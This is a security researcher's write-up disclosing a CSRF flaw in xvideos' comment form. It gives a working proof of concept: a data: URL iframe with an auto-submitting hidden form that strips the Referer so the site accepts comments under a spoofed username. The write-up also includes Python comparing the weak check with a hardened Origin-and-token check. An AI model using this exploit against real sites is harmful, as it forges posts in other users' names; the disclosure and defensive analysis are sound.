@zseano
UK Security Researcher
CSRF 'protection' bypass on xvideos
When commenting on a video on xvideos, no CSRF token is sent at all. The request is:
POST http://www.xvideos.com/video-post-comment/video_id/ HTTP/1.1
user=testuser&comment=testy&test=ok
We can actually spoof user= to be whatever we want.
However.. xvideos checks whether the Referer: header is xvideos.com or blank. If it's blank, it lets the request through.
But how can we send a blank Referer? This is where our trusty friend data: comes into play.
If you visit
data:text/html, <script>top.location.href='http://www.google.com/';</script>
in Chrome, it redirects with no Referer header and an Origin of null.
So let's create an iframe with a data: URL that carries our form and submits the post (replace video_here below with the video id).
<iframe src='data:text/html,<html>
  <head>
    <script>
      function doit() { document.getElementById("myForm").submit(); }
      setTimeout(doit, 2000);
    </script>
  </head>
  <div style="display:none;">
    <iframe id="myframe" name="myframe"></iframe>
    <form id="myForm" name="myForm" action="http://www.xvideos.com/video-post-comment/video_here/" method="POST" target="myframe">
      <input type="text" name="user" value="testuser">
      <input type="text" name="comment" value="testy">
      <input type="text" name="test" value="ok">
    </form>
  </div>
</html>'></iframe>
The request: [screenshot in the original post, not reproduced here]
The response: [screenshot in the original post, not reproduced here]
Notice that, thanks to data:, the Referer header is absent and Origin is "null", so xvideos lets it through. :)
Just checking Referer: is a bad approach to protecting against CSRF!
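As an added illustration (not code from the original post or from the site), here is a defender's model of both checks: the Referer-only logic the post describes, which admits the data: iframe request, beside a hardened check that treats a missing Origin/Referer or a literal Origin: null as a failure and additionally requires a per-session token. The allowed origin string, the csrf_token field name and the header dictionaries are constructed assumptions.

```python
from urllib.parse import urlsplit
import hmac

# Assumed allowed origin for the comment endpoint (constructed constant).
ALLOWED_ORIGIN = "http://www.xvideos.com"


def referer_only_check(headers: dict) -> bool:
    """Model of the weak check the post describes: accept when the Referer
    names xvideos.com, and also accept when it is blank or missing."""
    referer = headers.get("Referer", "")
    if referer == "":
        return True  # the hole: a suppressed Referer passes
    host = urlsplit(referer).hostname or ""
    return host == "www.xvideos.com" or host.endswith(".xvideos.com")


def hardened_check(headers: dict, form: dict, session_token: str) -> bool:
    """Reject unless (1) Origin, or failing that Referer, matches the site
    exactly (missing header or "null" both fail) and (2) the form carries
    the token bound to the user's session."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if not referer:
            return False  # no source information at all: refuse
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    if origin != ALLOWED_ORIGIN:  # also rejects the literal "null"
        return False
    # Constant-time comparison of the submitted token with the session's.
    return hmac.compare_digest(form.get("csrf_token", ""), session_token)


# Constructed headers/body for the data: iframe POST from the post:
# Chrome sends no Referer and Origin: null.
DATA_URI_HEADERS = {"Origin": "null"}
DATA_URI_FORM = {"user": "testuser", "comment": "testy", "test": "ok"}

# Constructed legitimate submission from the site's own comment form.
SESSION_TOKEN = "constructed-session-token"
LEGIT_HEADERS = {"Origin": ALLOWED_ORIGIN,
                 "Referer": ALLOWED_ORIGIN + "/video_here/"}
LEGIT_FORM = {**DATA_URI_FORM, "csrf_token": SESSION_TOKEN}

if __name__ == "__main__":
    print("referer-only admits data: request:",
          referer_only_check(DATA_URI_HEADERS))
    print("hardened admits data: request:",
          hardened_check(DATA_URI_HEADERS, DATA_URI_FORM, SESSION_TOKEN))
    print("hardened admits legitimate request:",
          hardened_check(LEGIT_HEADERS, LEGIT_FORM, SESSION_TOKEN))
```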